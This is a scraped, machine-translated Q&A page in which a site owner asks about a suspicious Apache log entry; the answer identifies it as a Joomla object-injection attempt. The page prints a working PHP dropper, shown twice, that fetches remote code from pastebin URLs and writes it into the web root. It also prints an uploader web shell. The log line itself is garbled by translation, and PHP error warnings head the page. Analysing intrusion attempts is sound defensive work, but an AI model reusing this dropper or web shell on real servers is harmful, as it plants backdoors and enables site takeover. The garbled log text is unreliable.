Warning: file_get_contents(/data/phpspider/zhask/data//catemap/9/google-cloud-platform/3.json): failed to open stream: No such file or directory in /data/phpspider/zhask/libs/function.php on line 167

Warning: Invalid argument supplied for foreach() in /data/phpspider/zhask/libs/tag.function.php on line 1116

Notice: Undefined index: in /data/phpspider/zhask/libs/function.php on line 180

Warning: array_chunk() expects parameter 1 to be array, null given in /data/phpspider/zhask/libs/function.php on line 181
Php MySQL注入尝试-如何从access.log复制?_Php_Sql_Security_Mysqli_Sql Injection - Fatal编程技术网

Php MySQL注入尝试-如何从access.log复制?

Php MySQL注入尝试-如何从access.log复制?,php,sql,security,mysqli,sql-injection,Php,Sql,Security,Mysqli,Sql Injection,我最近一直在努力防止在我的生产Apache/PHP/MySQL web应用程序中注入SQL 为此,我定期浏览Apache访问日志,查找异常请求,如果发现异常请求,偶尔尝试复制它们(有人有更好的建议吗?) 今天,我在访问日志中看到一个奇怪的日志。我看到存在HTTP引用,但我没有与原始请求匹配的日志。Apache错误日志中也没有匹配的日志,这意味着它“被服务器配置拒绝” 这是奇怪的日志(base_64已解码): 2008年10月19.69.18.18.18.100(10月22/3/2017:04:0

我最近一直在努力防止在我的生产Apache/PHP/MySQL web应用程序中注入SQL

为此,我定期浏览Apache访问日志,查找异常请求,如果发现异常请求,偶尔尝试复制它们(有人有更好的建议吗?)

今天,我在访问日志中看到一个奇怪的日志。我看到存在HTTP引用,但我没有与原始请求匹配的日志。Apache错误日志中也没有匹配的日志,这意味着它“被服务器配置拒绝”

这是奇怪的日志(base_64已解码):

2008年10月19.69.18.18.18.100(10月22/3/2017:04:01:01:37+0000)以下的“获取/HTTP/1.1“200 13963-”””))))网上网上测试(测试)中的“200.39.69.69.69.18.18.18.18.10.10.10.10”以下的“10.10”该“学校测试”中的“20013963-””””””)))))))网上测试(测试(测试测试)O:O:21:21:::::::::::::::21:“JD测试”测试测试学校测试测试”O:21:::::::::::::::“JD数据库数据库数据库驱动:1:“基于基于基于基于基于基于基于基于基于基于基于基于基于基于基于基于基于基于基于基于“JD数据库驱动数据库的驱动力宏宏宏宏宏宏基基基基基基基驱动驱动力的网站网站网站\'feed\u url\'s:3462:\“$check=$\u服务器['DOCUMENT_ROOT'].“/libraries/lol.php”; $fp=fopen(“$check”,“w+”); fwrite($fp,base64_解码($


"),; fclose($fp); JFactory::getConfig();exit\'s:19:\'cache\u name\u function\'s:6:'assert\'s:5:'cache\'b:1;s:11:'cache\u class\'O:20:'JDatabaseDriverMysql\'0:{}i:1;s:4:'init\';}s:13:'0\0\0\0连接\'b:1;}\xf0\xfd xfd\xfd\xfd

我试图通过邮递员复制这个GET请求,但它被视为“一个无效的XMLHTTPRequest”。我不确定通常如何测试它

我也不确定这是做什么的(或尝试做什么)。任何关于这是做什么的信息/理论(如果成功的话)都将不胜感激


我推测这只是一个简单的尝试,通过HTTP引用将SQL注入到某个“框架”中,但我不是专家。提前感谢您的帮助。

这是我解码它时得到的

<?php
$check = $_SERVER['DOCUMENT_ROOT'] . "/libraries/lol.php" ;
$fp=fopen("$check","w+");
fwrite($fp,
function http_get($url){
    $im = curl_init($url);
    curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($im, CURLOPT_HEADER, 0);
    return curl_exec($im);
    curl_close($im);
}
$check = $_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/wl.php" ;
$text = http_get('http://pastebin.com/raw/hjvDMQX1');
$open = fopen($check, 'w');
fwrite($open, $text);
fclose($open);
if(file_exists($check)){
    echo $check."</br>";
}else 
  echo "not exits";
echo "done .\n " ;
$check2 = $_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/jmail.php" ;
$text2 = http_get('http://pastebin.com/raw/KPh36MAb');
$open2 = fopen($check2, 'w');
fwrite($open2, $text2);
fclose($open2);
if(file_exists($check2)){
    echo $check2."</br>";
}else 
  echo "not exits2";
echo "done2 .\n " ;

$check3=$_SERVER['DOCUMENT_ROOT'] . "/s.htm" ;
$text3 = http_get('http://pastebin.com/raw/3Z6ZCHtZ');
$op3=fopen($check3, 'w');
fwrite($op3,$text3);
fclose($op3);

$check4=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/check.php" ;
$text4 = http_get('http://pastebin.com/raw/RA3giT4L');
$op4=fopen($check4, 'w');
fwrite($op4,$text4);
fclose($op4);

$check5=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/jmails.php" ;
$text5 = http_get('http://pastebin.com/raw/KPh36MAb');
$op5=fopen($check5, 'w');
fwrite($op5,$text5);
fclose($op5);

您可以首先解码该有效负载以查看其内容,但不要评估它的有趣性,好主意。我已通过手动解码日志更新了我的答案。(:哈哈。幸运的是,我没有使用Joomla。感谢您的回答(&@hankypanky在评论中)注:将攻击者的电子邮件留在问题正文中是否被视为“不良做法”?@RobertSchwindaman欢迎您。老实说,我也不知道这是否是一种不好的做法,因此最好更改电子邮件,并通知攻击者不要尝试这些技巧,因为您不使用Joomla。我的对策是:一般来说,如果试图恶意攻击他们不拥有的网站,应该三思。我知道如果我在堆栈上看到我的电子邮件,我会这样做。
<?php
$check = $_SERVER['DOCUMENT_ROOT'] . "/libraries/lol.php" ;
$fp=fopen("$check","w+");
fwrite($fp,
function http_get($url){
    $im = curl_init($url);
    curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($im, CURLOPT_HEADER, 0);
    return curl_exec($im);
    curl_close($im);
}
$check = $_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/wl.php" ;
$text = http_get('http://pastebin.com/raw/hjvDMQX1');
$open = fopen($check, 'w');
fwrite($open, $text);
fclose($open);
if(file_exists($check)){
    echo $check."</br>";
}else 
  echo "not exits";
echo "done .\n " ;
$check2 = $_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/jmail.php" ;
$text2 = http_get('http://pastebin.com/raw/KPh36MAb');
$open2 = fopen($check2, 'w');
fwrite($open2, $text2);
fclose($open2);
if(file_exists($check2)){
    echo $check2."</br>";
}else 
  echo "not exits2";
echo "done2 .\n " ;

$check3=$_SERVER['DOCUMENT_ROOT'] . "/s.htm" ;
$text3 = http_get('http://pastebin.com/raw/3Z6ZCHtZ');
$op3=fopen($check3, 'w');
fwrite($op3,$text3);
fclose($op3);

$check4=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/check.php" ;
$text4 = http_get('http://pastebin.com/raw/RA3giT4L');
$op4=fopen($check4, 'w');
fwrite($op4,$text4);
fclose($op4);

$check5=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/jmails.php" ;
$text5 = http_get('http://pastebin.com/raw/KPh36MAb');
$op5=fopen($check5, 'w');
fwrite($op5,$text5);
fclose($op5);
<?php 
// name of the file is: i (it has no extension)
error_reporting(0);

if(isset($_GET["0"]))
    {
        echo"<font color=#000FFF>[uname]".php_uname()."[/uname]";echo "<br>";print "\n";if(@ini_get("disable_functions")){echo "DisablePHP=".@ini_get("disable_functions");}else{ echo "Disable PHP = NONE";}echo "<br>";print "\n";if(@ini_get("safe_mode")){echo "Safe Mode = ON";}else{ echo "Safe Mode = OFF";} echo "<br>";print "\n";echo"<form method=post enctype=multipart/form-data>";echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";if($_POST["v"]==up){if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){echo"<b>berhasil</b>-->".$_FILES["f"]["name"];}else{echo"<b>gagal";}} }
echo 'walex';

echo 'uname:'.php_uname()."\n";
echo getcwd() . "\n";

?>